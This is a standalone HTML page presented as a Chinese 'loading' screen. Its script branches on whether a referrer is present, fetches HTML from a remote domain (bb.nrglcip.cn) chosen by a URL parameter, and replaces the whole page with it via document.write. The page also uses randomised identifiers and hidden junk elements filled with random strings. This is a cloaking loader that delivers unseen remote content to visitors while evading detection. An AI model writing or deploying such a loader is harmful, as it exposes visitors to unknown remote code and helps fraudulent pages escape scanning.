<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .lApy6mGCyE {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .lApy6mGCyE .dG1KUj {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .lApy6mGCyE .content {
            line-height: 50px;
            text-align: center
        }

        .lApy6mGCyE .img {
            width: 100%
        }

        .lApy6mGCyE .WXPYcoPb {
            text-align: center
        }

        .lApy6mGCyE .WXPYcoPb span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .lApy6mGCyE .WXPYcoPb span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .lApy6mGCyE .WXPYcoPb span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .lApy6mGCyE .WXPYcoPb span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .lApy6mGCyE .WXPYcoPb span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .lApy6mGCyE .WXPYcoPb span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .lApy6mGCyE .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function So0VutHiA(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var rf2lT = So0VutHiA('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ rf2lT +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ rf2lT +".html?a=share";
		}
		
        fi59SP3e=url+"#"+new Date().getTime();
        fi59SP3e && function() {
            $.get(fi59SP3e, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >oVrPrv7e4mWCAes0h0xmZEzlezzdyneZxeuwIfkzo6mgXIrHBK4rlap1RQ9eZCzulJhZD8yyOuYZeDeYCVUGMlmG5ZrgaP</b>
<a  href='#' style='display:none'>m8lUAzorqHtq9m2IaxA2ObDFPPOdM54Z3jut2pxmC8p7ChxPcWOUfpmbjS8KrRojoGO14j2NbNFn2ozTjR3</a>
<li style='display:none' >JmXMkd5YkZZKKazkplrZiFX0cavm1hVsryeS3xar</li>
<li style='display:none' >JmXMkd5YkZZKKazkplrZiFX0cavm1hVsryeS3xar</li>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<h1 style='display:none' >eVlpF88HkuaLLrMYTv9sFJFXaieVj7BsH83Z26WEbIfbTj6VWp6XxzQxNq7CHL</h1>
<h1 style='display:none' >eVlpF88HkuaLLrMYTv9sFJFXaieVj7BsH83Z26WEbIfbTj6VWp6XxzQxNq7CHL</h1><div class="lApy6mGCyE">
    <div class="dG1KUj">
        <div class="WXPYcoPb">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >kbMaiJ9nP3S19rt2P10c</ul>
<a  href='#' style='display:none'>YPBkYzG9eX4llzjfiwCrzDmWbjkvhTWfO5X0mnSriOEQAwHG2XWdiieKDbyX7aaAvsrrSi5BwME7ol7</a>
<ul style='display:none' >kbMaiJ9nP3S19rt2P10c</ul>
<h1 style='display:none' >UaKq24vkc3n80pKdnaUawLr0Qf0mRRPdiBjJ5qRZynYwKwTNS3kwpmItDtqi7XjMmSItxDL3bFsl</h1>
<ul style='display:none' >kbMaiJ9nP3S19rt2P10c</ul>
<b style='display:none' >xLmzDRYLJ5vF63FjbDC7WbcwRlC4neCaA2p06Z</b>
<b style='display:none' >xLmzDRYLJ5vF63FjbDC7WbcwRlC4neCaA2p06Z</b></body>
</html>